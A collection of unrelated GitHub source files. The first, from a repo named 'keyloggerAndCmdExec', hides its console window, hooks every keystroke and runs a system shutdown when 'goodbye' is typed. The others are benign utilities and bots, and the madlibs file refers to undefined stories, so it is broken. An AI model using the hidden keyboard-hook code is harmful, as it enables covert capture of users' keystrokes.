{"seq_id":"10838143199","text":"import win32api\r\nimport win32console\r\nimport win32gui\r\nimport pythoncom,pyHook\r\nimport os\r\n\r\n\r\n \r\nwin=win32console.GetConsoleWindow()\r\nwin32gui.ShowWindow(win,0)\r\n\r\ndata=''\r\ndef OnKeyboardEvent(event):\r\n    global data\r\n    # NOTE: the control-key labels below are reconstructed; the original angle-bracket text was stripped\r\n    if event.Ascii==13:\r\n        keys='<ENTER>'\r\n    elif event.Ascii==8:\r\n        keys='<BACKSPACE>'\r\n    elif event.Ascii==9:\r\n        keys='<TAB>'\r\n    else:\r\n        keys=chr(event.Ascii)\r\n    data=data+keys\r\n    local()\r\n    \r\ndef local():\r\n    global data\r\n    if \"goodbye\" in data:\r\n        os.system('shutdown -s')\r\n        data = \"\"\r\n    if \"notepad\" in data:\r\n        os.system('start notepad')\r\n        data = \"\"\r\n    if \"internetexp\" in data:\r\n        os.system('start iexplore')\r\n        data = \"\"\r\n    return True\r\n\r\n\r\n    \r\n\r\n\r\n    \r\nhm=pyHook.HookManager()\r\nhm.KeyDown=OnKeyboardEvent \r\nhm.HookKeyboard() \r\npythoncom.PumpMessages()\r\n","repo_name":"GokuSsj21/keyloggerAndCmdExec","sub_path":"keytype.py","file_name":"keytype.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5953205307","text":"import requests\nimport os\nimport json\nfrom datetime import datetime, timezone\nfrom .logger import logger\n\n\ndef utc_time_string():\n    utc_time = datetime.utcnow().replace(tzinfo=timezone.utc)\n    return 
datetime.strftime(utc_time, \"%Y-%m-%d %H:%M:%S %Z\")\n\n\ndef write_info_into_config(**kwargs):\n    config = {\n        \"last_update_time\": utc_time_string(),\n        **kwargs,\n    }\n    with open(\"./page/config.json\", \"w\", encoding=\"utf-8\") as config_file:\n        json.dump(config, config_file)\n\n\ndef get_user_config():\n    if os.getenv(\"UID_PWD\") is None:\n        from dotenv import load_dotenv\n\n        logger.info(\"Loading environment variables from the .env file ...\")\n        load_dotenv()\n    return os.getenv(\"UID_PWD\").split(\"&\")\n\n\ndef download_img(image_url):\n    logger.info(f\"Downloading image from {image_url}\")\n    response = requests.get(image_url)\n    with open(\"./page/images/passcode.png\", \"wb\") as f:\n        f.write(response.content)\n    logger.info(\"Download completed ...\")\n    return True\n","repo_name":"bitter24/myown","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19111348417","text":"import sqlite3\n\ntry:\n    sqliteConnection = sqlite3.connect('SQLite_Python.db')\n    cursor = sqliteConnection.cursor()\n    print('Database has been created')\n\n    sqlite_select_query = 'select sqlite_version();'\n    cursor.execute(sqlite_select_query)\n    record = cursor.fetchall()\n    print('SQLite Database version:', record)\n    cursor.close()\nexcept sqlite3.Error as error:\n    print('Error while connecting to the database', error)\nfinally:\n    if sqliteConnection:\n        sqliteConnection.close()\n        print(\"The connection has been closed\")\n","repo_name":"dev-com2020/szkolenie_061222","sub_path":"baza.py","file_name":"baza.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"38853452061","text":"import numpy as np\nimport copy \nimport math\n\nimport torch \nfrom torch import nn, optim\nimport torch.nn.functional as F\n\nclass Client_MTL(object):\n    def __init__(self, name, model, local_bs, local_ep, lr, momentum, device, omega,\n                 train_dl_local = None, test_dl_local = None):\n        \n        self.name = name \n        self.net = model\n        self.local_bs = local_bs\n        self.local_ep = local_ep\n        self.lr = lr \n        self.momentum = momentum \n        self.device = device \n        self.omega = omega\n        self.loss_func = nn.CrossEntropyLoss()\n        self.ldr_train = train_dl_local\n        self.ldr_test = test_dl_local\n        self.acc_best = 0 \n        self.count = 0 \n        self.save_best = True \n        \n    def train(self, idx, W_glob, is_print = False):\n        self.net.to(self.device)\n        self.net.train()\n        \n        optimizer = torch.optim.SGD(self.net.parameters(), lr=self.lr, momentum=self.momentum, weight_decay=0)\n\n        epoch_loss = []\n        for iteration in range(self.local_ep):\n            batch_loss = []\n            for batch_idx, (images, labels) in enumerate(self.ldr_train):\n                images, labels = images.to(self.device), labels.to(self.device)\n                self.net.zero_grad()\n                #optimizer.zero_grad()\n                log_probs = self.net(images)\n                loss = self.loss_func(log_probs, labels)\n\n                W = W_glob.clone()\n\n                W_local = [v.flatten() for v in self.get_state_dict(keep_vars=True).values()]\n                W_local = torch.cat(W_local)\n                W[:, idx] = W_local\n\n                loss_regularizer = 0\n                loss_regularizer += W.norm() ** 2\n\n                k = 4000\n                for i in range(W.shape[0] // k):\n                    x = W[i * k:(i+1) * k, :]\n                    loss_regularizer += x.mm(self.omega).mm(x.T).trace()\n                f = (int)(math.log10(W.shape[0])+1) + 1\n                loss_regularizer *= 10 ** (-f)\n\n                loss = loss + loss_regularizer\n                loss.backward() \n                \n                optimizer.step()\n                batch_loss.append(loss.item())\n            \n            epoch_loss.append(sum(batch_loss)/len(batch_loss))\n            
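# epoch_loss holds one averaged batch loss per local epoch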
\n# if self.save_best: \n# _, acc = self.eval_test()\n# if acc > self.acc_best:\n# self.acc_best = acc \n \n return sum(epoch_loss) / len(epoch_loss)\n \n def get_state_dict(self, keep_vars=False):\n return self.net.state_dict(keep_vars=keep_vars)\n def get_best_acc(self):\n return self.acc_best\n def get_count(self):\n return self.count\n def get_net(self):\n return self.net\n def set_state_dict(self, state_dict):\n self.net.load_state_dict(state_dict)\n\n def eval_test(self):\n self.net.to(self.device)\n self.net.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in self.ldr_test:\n data, target = data.to(self.device), target.to(self.device)\n output = self.net(data)\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n test_loss /= len(self.ldr_test.dataset)\n accuracy = 100. * correct / len(self.ldr_test.dataset)\n return test_loss, accuracy\n \n def eval_train(self):\n self.net.to(self.device)\n self.net.eval()\n train_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in self.ldr_train:\n data, target = data.to(self.device), target.to(self.device)\n output = self.net(data)\n train_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n train_loss /= len(self.ldr_train.dataset)\n accuracy = 100. * correct / len(self.ldr_train.dataset)\n return train_loss, accuracy\n\ndef eval_test(net, args, ldr_test): \n net.to(args.device)\n net.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in ldr_test:\n data, target = data.to(args.device), target.to(args.device)\n output = net(data)\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n test_loss /= len(ldr_test.dataset)\n accuracy = 100. 
* correct / len(ldr_test.dataset)\n    return test_loss, accuracy","repo_name":"MMorafah/PACFL","sub_path":"src/client/client_mtl.py","file_name":"client_mtl.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"}
{"seq_id":"3821541751","text":"# This file is Originally Written By @okay-retard on GitHub\n# The Author (Jayant Kageri) just Ported this for Devloper Userbot\n# (C) 2021 Jayant Kageri\n\nimport os\nfrom datetime import datetime\n\nfrom pyrogram import filters\nfrom pyrogram.types import User, InlineKeyboardMarkup, InlineKeyboardButton, Message\nfrom pyrogram.raw import functions\nfrom pyrogram.errors import PeerIdInvalid\nfrom _pyrogram import app\nfrom config import PREFIX\n\n\ndef ReplyCheck(message: Message):\n    reply_id = None\n\n    if message.reply_to_message:\n        reply_id = message.reply_to_message.message_id\n\n    elif not message.from_user.is_self:\n        reply_id = message.message_id\n\n    return reply_id\n\n\ninfotext = (\n    \"**🕵️‍♀️ [{full_name}](tg://user?id={user_id})**\\n\\n\"\n    \"  ➠ User ID: `{user_id}`\\n\"\n    \"  ➠ First name: `{first_name}`\\n\"\n    \"  ➠ Last name: `{last_name}`\\n\"\n    \"  ➠ Username: @{username}\\n\"\n)\n\n\ndef FullName(user: User):\n    return user.first_name + \" \" + user.last_name if user.last_name else user.first_name\n\n\n@app.on_message(filters.command(\"info\", PREFIX) & filters.me)\nasync def whois(client, message):\n    cmd = message.command\n    if not message.reply_to_message and len(cmd) == 1:\n        get_user = message.from_user.id\n    elif len(cmd) == 1:\n        get_user = message.reply_to_message.from_user.id\n    elif len(cmd) > 1:\n        get_user = cmd[1]\n        try:\n            get_user = int(cmd[1])\n        except ValueError:\n            pass\n    try:\n        user = await client.get_users(get_user)\n    except Exception as e:\n        await message.edit(f\"{e}\")\n        return\n    await message.edit_text(\n        infotext.format(\n            full_name=FullName(user),\n            user_id=user.id,\n            first_name=user.first_name,\n            last_name=user.last_name or \"\",\n            username=user.username or \"\",\n        ),\n        disable_web_page_preview=True,\n    )\n\n\n@app.on_message(filters.command(\"id\", PREFIX) & filters.me)\nasync def id(client, message):\n    # NOTE: the Markdown [label](url) wrappers below are a best-guess\n    # reconstruction; the original link markup was lost in extraction\n    text_unping = 'Chat ID:'\n    if message.chat.username:\n        text_unping = f'[{text_unping}](https://t.me/{message.chat.username})'\n    text_unping += f' {message.chat.id}\\n'\n    text = 'Message ID:'\n    if message.link:\n        text = f'[{text}]({message.link})'\n    text += f' {message.message_id}\\n'\n    text_unping += text\n    if message.from_user:\n        text_unping += f'User ID: {message.from_user.id}\\n'\n    text_ping = text_unping\n    reply = message.reply_to_message\n    if not getattr(reply, 'empty', True):\n        text_unping += '\\n'\n        text = 'Replied message ID:'\n        if reply.link:\n            text = f'[{text}]({reply.link})'\n        text += f' {reply.message_id}\\n'\n        text_unping += text\n        text_ping = text_unping\n        if reply.from_user:\n            text = 'Replied user ID:'\n            if reply.from_user.username:\n                text = f'[{text}](https://t.me/{reply.from_user.username})'\n            text += f' {reply.from_user.id}\\n'\n            text_unping += text\n            text_ping += f'Replied user ID: {reply.from_user.id}\\n'\n        if reply.forward_from:\n            text_unping += '\\n'\n            text = 'Forwarded user ID:'\n            if reply.forward_from.username:\n                text = f'[{text}](https://t.me/{reply.forward_from.username})'\n            text += f' {reply.forward_from.id}\\n'\n            text_unping += text\n            text_ping += f'\\nForwarded user ID: {reply.forward_from.id}\\n'\n    reply = await message.edit(text_unping, disable_web_page_preview=True)\n    if text_unping != text_ping:\n        await message.edit(text_ping, disable_web_page_preview=True)\n","repo_name":"FawazXs/YamiUserbot","sub_path":"_pyrogram/modules/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"73073800487","text":"import logging\nfrom telegram.ext import Updater, MessageHandler, Filters, ConversationHandler\nfrom telegram.ext import CallbackContext, CommandHandler\nfrom settings import TOKEN\n\nlogger = logging.getLogger(__name__)\n\n\ndef start(update, context):\n    update.message.reply_text(\n        \"Hi. Please take a short survey!\\n\"\n        \"You can stop the survey by sending the /stop command.\\n\"\n        \"What city do you live in?\")\n    return 1\n\n\ndef first_response(update, context):\n    locality = update.message.text\n    if locality == '/skip':\n        locality = 'outside your window'\n        update.message.reply_text(\n            \"What is the weather outside your window?\")\n    else:\n        update.message.reply_text(f\"What is the weather like in {locality}?\")\n    return 2\n\n\ndef second_response(update, context):\n    weather = update.message.text\n    print(weather)\n    update.message.reply_text(\"Thank you for taking the survey! All the best!\")\n    return ConversationHandler.END\n\n\ndef stop(update, context):\n    return ConversationHandler.END\n\n\ndef main():\n    updater = Updater(TOKEN, use_context=True)\n\n    dp = updater.dispatcher\n    conv_handler = ConversationHandler(\n        entry_points=[CommandHandler('start', start)],\n\n        states={\n            1: [MessageHandler(Filters.text, first_response)],\n            2: [MessageHandler(Filters.text, second_response)]\n        },\n\n        fallbacks=[CommandHandler('stop', stop)]\n    )\n    dp.add_handler(conv_handler)\n    updater.start_polling()\n\n    updater.idle()\n\n\nif __name__ == '__main__':\n    main()","repo_name":"axelsvenn/web-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"24829532489","text":"import torch\r\n\r\n\r\ndef mrr(predictions, ground_truth_idx):\r\n    \"\"\"Calculates mean reciprocal rank (MRR) for given predictions and ground truth values.\r\n    :param predictions: BxN tensor of prediction values where B is batch size and N number of classes. 
Predictions\r\n    must be sorted in class ids order\r\n    :param ground_truth_idx: Bx1 tensor with index of ground truth class\r\n    :return: Mean reciprocal rank score\r\n    \"\"\"\r\n    indices = predictions.argsort()\r\n    mean_rank = (indices == ground_truth_idx).nonzero().float().add(1.0).sum().item()\r\n    reciprocal_rank = 1.0/mean_rank\r\n\r\n    return reciprocal_rank\r\n\r\ndef hit_at_k(predictions, ground_truth, k):\r\n    zero_tensor = torch.Tensor([0])\r\n    one_tensor = torch.Tensor([1])\r\n    ground_truth = ground_truth#.cuda()\r\n    _, indices = predictions.topk(k=k, largest=False)\r\n    indices = indices.cuda()\r\n    rank = torch.where(indices == ground_truth, one_tensor.cuda(), zero_tensor.cuda()).sum().item()\r\n\r\n    return rank\r\n\r\ndef gen_mean_rank(predictions, ground_truth_idx):\r\n    indices = predictions.argsort()\r\n    mean_rank = (indices == ground_truth_idx).nonzero().float().add(1.0).sum().item()\r\n    mean_rank = float(mean_rank / predictions.size()[0])\r\n\r\n    return mean_rank\r\n\r\n","repo_name":"Pallab38/model_transE","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"35413966950","text":"\"\"\"Madlibs Stories.\"\"\"\n\n\nclass Story:\n    \"\"\"Madlibs story.\n    To make a story, pass a code, a title, a list of prompts, and the text\n    of the template.\n    >>> s = Story(\"s0\", \"Demo\", [\"noun\", \"verb\"],\n    ...     \"I love to {verb} a good {noun}.\")\n    To generate text from a story, pass in a dictionary-like thing\n    of {prompt: answer, prompt: answer}:\n    >>> ans = {\"verb\": \"eat\", \"noun\": \"mango\"}\n    >>> s.generate(ans)\n    'I love to eat a good mango.'\n    \"\"\"\n\n    def __init__(self, code, title, words, text):\n        \"\"\"Create story with words and template text.\"\"\"\n\n        self.code = code\n        self.title = title\n        self.prompts = words\n        # list of the prompts used in the story template\n        self.template = text\n        # The story template including the prompts to be replaced\n\n    def __repr__(self):\n        # NOTE: the original repr string (angle-bracket text) was stripped; reconstructed here\n        return f\"<Story {self.code}: {self.title}>\"\n\n    def generate(self, answers):\n        \"\"\"Substitute answers into text.\"\"\"\n\n        text = self.template\n        # text is the story template with the prompts to be replaced by the answers generated from the form\n\n        for (key, val) in answers.items():\n            # unpack the answers dict into key value pairs\n            text = text.replace(\"{\" + key + \"}\", val)\n            # for each key value pair, replace the key and {} with its associated value from the answers dict\n\n        return text\n        # returns the text from the story template with the answers in place of the prompts\n\n\n\nstory1 = Story(\n    \"s1\",\n    \"Once Upon A Time\",\n    [\"place\", \"noun\", \"verb\", \"adjective\", \"plural_noun\"],\n    \"\"\"Once upon a time in a long-ago {place}, there lived a\n       large {adjective} {noun}. 
It loved to {verb} {plural_noun}.\"\"\"\n)\n\nstories = {story.code: story for story in [story1, story2, story3]}","repo_name":"sasha8265/flask-madlibs","sub_path":"stories.py","file_name":"stories.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20011616060","text":"\"\"\"\nBaseline hierarchical configuration setup functions for Brokkr.\n\"\"\"\n\n# Standard library imports\nimport abc\nimport argparse\nimport collections.abc\nimport copy\nimport json\nimport logging\nimport os\nfrom pathlib import Path\n\n# Third party imports\nimport tomli\nimport tomli_w\n\n# Local imports\nfrom brokkr.constants import (\n LEVEL_NAME_LOCAL,\n LEVEL_NAME_REMOTE,\n LEVEL_NAME_SYSTEM,\n LEVEL_NAME_SYSTEM_CLIENT,\n )\nimport brokkr.utils.misc\n\n\n# General static constants\nDEFAULT_CONFIG_TYPE_NAME = \"config\"\nLEVEL_NAME_CLI_ARGS = \"cli_args\"\nLEVEL_NAME_DEFAULTS = \"defaults\"\nLEVEL_NAME_ENV_VARS = \"env_vars\"\nLEVEL_NAME_FILE = \"local\"\nLEVEL_NAME_OVERLAY = \"overlay\"\nLEVEL_NAME_PRESETS = \"presets\"\n\nEXTENSION_TOML = \"toml\"\nEXTENSION_JSON = \"json\"\nEXTENSION_DEFAULT = EXTENSION_TOML\nEXTENSIONS_SUPPORTED = [EXTENSION_TOML, EXTENSION_JSON]\n\nVERSION_KEY = \"config_version\"\nEMPTY_CONFIG = (\"config_is_empty\", True)\nJSON_SEPERATORS = (\",\", \":\")\nCONFIG_VERSION_DEFAULT = 1\n\nLEVEL_CLASS = \"level_class\"\nLEVEL_ARGS = \"level_args\"\n\n\n# --- Utility functions --- #\n\ndef check_extension_supported(extension):\n if extension not in EXTENSIONS_SUPPORTED:\n raise ValueError(\"Extension must be one of \"\n f\"{EXTENSIONS_SUPPORTED}, not {extension}\")\n\n\ndef convert_paths(config_data, path_variables):\n # Format string paths as pathlib paths with username expanded\n for key_name in path_variables:\n inner_dict = config_data\n try:\n inner_dict = brokkr.utils.misc.get_inner_dict(\n obj=config_data, keys=key_name[:-1])\n inner_dict[key_name[-1]] = brokkr.utils.misc.convert_path(\n inner_dict[key_name[-1]])\n # Ignore missing keys\n except KeyError:\n continue\n return config_data\n\n\ndef read_config_file(path, extension=None, logger=None):\n if logger is True:\n logger = logging.getLogger(__name__)\n path = Path(path)\n if extension is None:\n extension = path.suffix.strip(\".\")\n check_extension_supported(extension)\n if extension == EXTENSION_TOML:\n try:\n with open(path, mode=\"rb\") as toml_file:\n config_data = tomli.load(toml_file)\n except tomli.TOMLDecodeError as e:\n if logger is not None:\n logger.error(\"%s reading TOML config file %r: %s\",\n type(e).__name__, path.as_posix(), e)\n logger.info(\"Error details:\", exc_info=True)\n raise SystemExit(1) from e\n raise\n elif extension == EXTENSION_JSON:\n with open(path, \"r\", encoding=\"utf-8\") as config_file:\n try:\n config_data = json.load(config_file)\n except Exception as e:\n if logger is not None:\n logger.error(\"%s reading JSON config file %r: %s\",\n type(e).__name__, path.as_posix(), e)\n logger.info(\"Error details:\", exc_info=True)\n raise SystemExit(1) from e\n raise\n\n return config_data\n\n\ndef write_config_file(config_data, path, extension=None):\n path = Path(path)\n if extension is None:\n extension = Path(path).suffix.strip(\".\")\n check_extension_supported(extension)\n os.makedirs(path.parent, exist_ok=True)\n if extension == EXTENSION_TOML:\n with open(path, \"wb\") as config_file:\n tomli_w.dump(config_data, config_file)\n elif extension == EXTENSION_JSON:\n with open(path, \"w\", 
encoding=\"utf-8\", newline=\"\\n\") as config_file:\n json.dump(config_data, config_file,\n allow_nan=False, separators=JSON_SEPERATORS)\n\n\ndef insert_values(config_data, insert_items, logger=None):\n # pylint: disable=too-many-nested-blocks, too-many-branches\n if logger is True:\n logger = logging.getLogger(__name__)\n\n # Insert the specified values into the given keys\n for preset_name, preset_data in config_data.items():\n for table_name, target_key in insert_items:\n if (preset_data.get(table_name, None) is None\n or preset_data.get(target_key, None) is None):\n continue # Skip if source or target table is not preset\n if preset_data[table_name].get(\n target_key, None) is not None:\n # If target key is present at first level, use that\n target_tables = {table_name: preset_data[table_name]}\n else:\n # Otherwise, check for the key in the table's subdicts\n target_tables = preset_data[table_name]\n for target_name, target_table in target_tables.items():\n if target_table.get(target_key, None) is None:\n continue # Skip target tables that lack the key at all\n if not target_table[target_key]:\n # If key is empty, fill it with the entire source table\n target_table[target_key] = preset_data[target_key]\n continue\n # Otherwise, do a lookup in the source table\n try:\n if brokkr.utils.misc.is_iterable(\n target_table[target_key]):\n if isinstance(preset_data[target_key],\n collections.abc.Mapping):\n # If the target is an iterable and the src a dict,\n # look up each value in the source table\n target_table[target_key] = {\n inner_key: preset_data[target_key][inner_key]\n for inner_key in target_table[target_key]}\n else:\n # Otherwise, if both are lists, merge them\n target_table[target_key] = set(\n target_table[target_key]\n + preset_data[target_key])\n else:\n # Otherwise, look up the value in the source table\n # and merge them, keeping values in the original\n merged_table = brokkr.utils.misc.update_dict_recursive(\n preset_data[target_key][target_table[target_key]],\n target_table)\n target_table.update(merged_table)\n # And remove the now-redundant item\n del target_table[target_key]\n except KeyError as e:\n if not logger:\n raise\n logger.error(\n \"%s inserting value for preset %r: \"\n \"Can't find inner key %s in key %r to insert into \"\n \"table %r, subtable %r\",\n type(e).__name__, preset_name, e, target_key,\n table_name, target_name)\n logger.info(\"Error details:\", exc_info=True)\n logger.info(\"Possible keys: %r\",\n list(preset_data[target_key].keys()))\n raise SystemExit(1) from e\n\n return config_data\n\n\n# --- Config type --- #\n\nclass ConfigType(brokkr.utils.misc.AutoReprMixin):\n def __init__(\n self,\n name,\n defaults=None,\n overlay=None,\n local_config_path=None,\n preset_config_path=None,\n path_variables=None,\n config_version=CONFIG_VERSION_DEFAULT,\n ):\n self.name = name\n self.defaults = {} if defaults is None else defaults\n self.overlay = overlay\n self.local_config_path = (\n None if local_config_path is None else Path(local_config_path))\n self.preset_config_path = (\n None if preset_config_path is None else Path(preset_config_path))\n self.path_variables = [] if path_variables is None else path_variables\n self.config_version = config_version\n\n\n# --- Config level classes #\n\nclass ConfigLevel(brokkr.utils.misc.AutoReprMixin, metaclass=abc.ABCMeta):\n def __init__(\n self,\n name,\n config_type=None,\n logger=None,\n ):\n self.name = name\n self.config_type = (ConfigType(DEFAULT_CONFIG_TYPE_NAME)\n if config_type is None else 
config_type)\n        self.logger = logger\n\n    def generate_config(self):\n        if self.config_type.config_version is not None:\n            config_data = {VERSION_KEY: self.config_type.config_version}\n        else:\n            config_data = {}\n        return config_data\n\n    @abc.abstractmethod\n    def read_config(self, input_data=None):\n        config_data = convert_paths(\n            input_data, self.config_type.path_variables)\n        return config_data\n\n\nclass WritableConfigLevel(ConfigLevel, metaclass=abc.ABCMeta):\n    @abc.abstractmethod\n    def write_config(self, config_data=None):\n        pass\n\n\nclass DefaultsConfigLevel(ConfigLevel):\n    def __init__(self, name=LEVEL_NAME_DEFAULTS, **kwargs):\n        super().__init__(name=name, **kwargs)\n\n    def generate_config(self):\n        config_data = super().generate_config()\n        # dict.update() mutates in place and returns None, so don't reassign\n        config_data.update(self.config_type.defaults)\n        return config_data\n\n    def read_config(self, input_data=None):\n        if input_data is None:\n            input_data = copy.deepcopy(self.config_type.defaults)\n        else:\n            input_data = copy.deepcopy(input_data)\n        return super().read_config(input_data)\n\n\nclass FileConfigLevel(WritableConfigLevel):\n    def __init__(\n            self,\n            name=LEVEL_NAME_FILE,\n            path=None,\n            extension=EXTENSION_DEFAULT,\n            preset=False,\n            append_level=False,\n            **kwargs,\n            ):\n        check_extension_supported(extension)\n        super().__init__(name=name, **kwargs)\n        self.extension = extension\n        self.preset = preset\n\n        # Setup full config path given defaults\n        if path is not None:\n            self.path = Path(path)\n        elif self.preset:\n            self.path = self.config_type.preset_config_path\n        else:\n            self.path = self.config_type.local_config_path\n\n        # Generate filename and add to path if needed\n        # (Path.suffix keeps the leading dot, so strip it before comparing)\n        if self.path.suffix.strip(\".\") != self.extension:\n            config_filename = self.config_type.name\n            if append_level:\n                config_filename = \"_\".join([config_filename, self.name])\n            config_filename += (\".\" + self.extension)\n            self.path = self.path / config_filename\n\n    def read_config(self, input_data=None):\n        if input_data is None:\n            try:\n                config_data = read_config_file(\n                    path=self.path,\n                    extension=self.extension,\n                    logger=self.logger,\n                    )\n            # Generate or ignore config_name file if it does not yet exist\n            except FileNotFoundError:\n                if not self.preset:\n                    config_data = self.write_config()\n                else:\n                    config_data = {}\n        else:\n            config_data = copy.deepcopy(input_data)\n\n        # Delete empty config key, added to avoid unreadable empty JSONs\n        try:\n            del config_data[EMPTY_CONFIG[0]]\n        except KeyError:\n            pass\n\n        config_data = super().read_config(config_data)\n        return config_data\n\n    def write_config(self, config_data=None):\n        # Prevent JSON errors from serializing/deserializing empty dict\n        if not config_data and self.extension == EXTENSION_JSON:\n            config_data = {EMPTY_CONFIG[0]: EMPTY_CONFIG[1]}\n\n        # Merge config data with generated baseline\n        if not config_data:\n            config_data = self.generate_config()\n        else:\n            config_data = {**self.generate_config(), **config_data}\n\n        write_config_file(config_data, self.path)\n        return config_data\n\n\nclass PresetsConfigLevel(ConfigLevel):\n    def __init__(\n            self,\n            name=LEVEL_NAME_PRESETS,\n            path=None,\n            filename_glob=f\"*.preset.{EXTENSION_DEFAULT}\",\n            key_name=\"name\",\n            template=None,\n            insert_items=None,\n            **kwargs,\n            ):\n        super().__init__(name=name, **kwargs)\n        self.filename_glob = filename_glob\n        self.key_name = key_name\n        self.template = {} if template is None else template\n        self.insert_items = {} if insert_items is None else insert_items\n\n        if path is not None:\n            self.path = Path(path)\n        else:\n            self.path = self.config_type.local_config_path\n\n    def 
read_config(self, input_data=None):\n        if input_data is None:\n            preset_paths = self.path.glob(self.filename_glob)\n            presets = {\n                path: brokkr.utils.misc.update_dict_recursive(\n                    copy.deepcopy(self.template), read_config_file(\n                        path=path, logger=self.logger))\n                for path in preset_paths}\n            config_data = {\n                preset.get(self.key_name, path.stem.split(\".\")[0]): preset\n                for path, preset in presets.items()}\n            config_data = insert_values(\n                config_data, self.insert_items, logger=self.logger)\n\n        else:\n            config_data = copy.deepcopy(input_data)\n\n        config_data = super().read_config(input_data=config_data)\n        return config_data\n\n\nclass MappingConfigLevel(ConfigLevel):\n    def __init__(\n            self,\n            name,\n            mapping,\n            **kwargs,\n            ):\n        self.mapping = mapping\n        super().__init__(name=name, **kwargs)\n\n    def read_config(self, input_data=None):\n        config_data = {}\n        if input_data:\n            for src_key, config_keys in self.mapping.items():\n                config_value = input_data.get(src_key, None)\n                # Recursively set config keys\n                if config_value is not None:\n                    inner_dict = config_data\n                    for config_section in config_keys[:-1]:\n                        try:\n                            inner_dict = inner_dict[config_section]\n                        except KeyError:\n                            inner_dict[config_section] = {}\n                            inner_dict = inner_dict[config_section]\n                    inner_dict[config_keys[-1]] = config_value\n\n        return super().read_config(config_data)\n\n\nclass EnvVarsConfigLevel(MappingConfigLevel):\n    def __init__(self, name=LEVEL_NAME_ENV_VARS, mapping=None, **kwargs):\n        super().__init__(name=name, mapping=mapping, **kwargs)\n\n    def read_config(self, input_data=None):\n        if input_data is None:\n            input_data = os.environ\n        config_data = super().read_config(input_data)\n        return config_data\n\n\nclass CLIArgsConfigLevel(MappingConfigLevel):\n    def __init__(self, name=LEVEL_NAME_CLI_ARGS, mapping=None, **kwargs):\n        super().__init__(name=name, mapping=mapping, **kwargs)\n\n    def read_config(self, input_data=None):\n        if input_data is None:\n            arg_parser = argparse.ArgumentParser(\n                argument_default=argparse.SUPPRESS,\n                usage=argparse.SUPPRESS,\n                add_help=False,\n                )\n            for arg_name in self.mapping.keys():\n                arg_parser.add_argument(f\"--{arg_name.replace('_', '-')}\")\n\n            cli_args, __ = arg_parser.parse_known_args()\n        else:\n            cli_args = input_data\n\n        # Convert to dict if cli_args is a namespace, ignoring errors\n        try:\n            cli_args = vars(cli_args)\n        except TypeError:\n            pass\n\n        config_data = super().read_config(cli_args)\n        return config_data\n\n\n# --- Config handler classes #\n\nclass ConfigHandler(brokkr.utils.misc.AutoReprMixin):\n    def __init__(self, config_type=None, config_levels=None):\n        self.config_type = (ConfigType(DEFAULT_CONFIG_TYPE_NAME)\n                            if config_type is None else config_type)\n\n        config_levels = [] if config_levels is None else config_levels\n        self.config_levels = {}\n        if (self.config_type.defaults is not None\n                and not any((isinstance(config_level, DefaultsConfigLevel)\n                             for config_level in config_levels))):\n            defaults_config_level = DefaultsConfigLevel(\n                config_type=self.config_type)\n            config_levels = [defaults_config_level, *config_levels]\n        for config_level in config_levels:\n            self.config_levels[config_level.name] = config_level\n\n    def read_configs(self, config_names=None):\n        configs = {}\n        if config_names is None:\n            config_names = self.config_levels.keys()\n        configs = {config_name: self.config_levels[config_name].read_config()\n                   for config_name in config_names}\n        if self.config_type.overlay is not None:\n            configs[LEVEL_NAME_OVERLAY] = copy.deepcopy(\n                self.config_type.overlay)\n        return configs\n\n    def 
render_config(self, configs=None):\n        if configs is None:\n            configs = self.read_configs()\n\n        # Recursively build final config dict from succession of loaded configs\n        rendered_config = copy.deepcopy(\n            configs[list(configs.keys())[0]])\n        for config_name in list(configs.keys())[1:]:\n            if configs[config_name]:\n                rendered_config = brokkr.utils.misc.update_dict_recursive(\n                    rendered_config, configs[config_name])\n\n        return rendered_config\n\n\nCONFIG_LEVEL_PRESETS = {\n    LEVEL_NAME_SYSTEM: {LEVEL_ARGS: {\n        \"preset\": True}},\n    LEVEL_NAME_SYSTEM_CLIENT: {LEVEL_ARGS: {\n        \"preset\": True, \"append_level\": True}},\n    LEVEL_NAME_REMOTE: {LEVEL_ARGS: {\n        \"extension\": EXTENSION_JSON, \"append_level\": True}},\n    LEVEL_NAME_LOCAL: {},\n    }\n\n\nclass ConfigHandlerFactory(brokkr.utils.misc.AutoReprMixin):\n    def __init__(\n            self,\n            level_presets=None,\n            overlays=None,\n            ignore_cli_args=False,\n            **default_type_kwargs,\n            ):\n        self.level_presets = (\n            CONFIG_LEVEL_PRESETS if level_presets is None else level_presets)\n        self.overlays = overlays\n        self.ignore_cli_args = ignore_cli_args\n        self.default_type_kwargs = default_type_kwargs\n\n    def 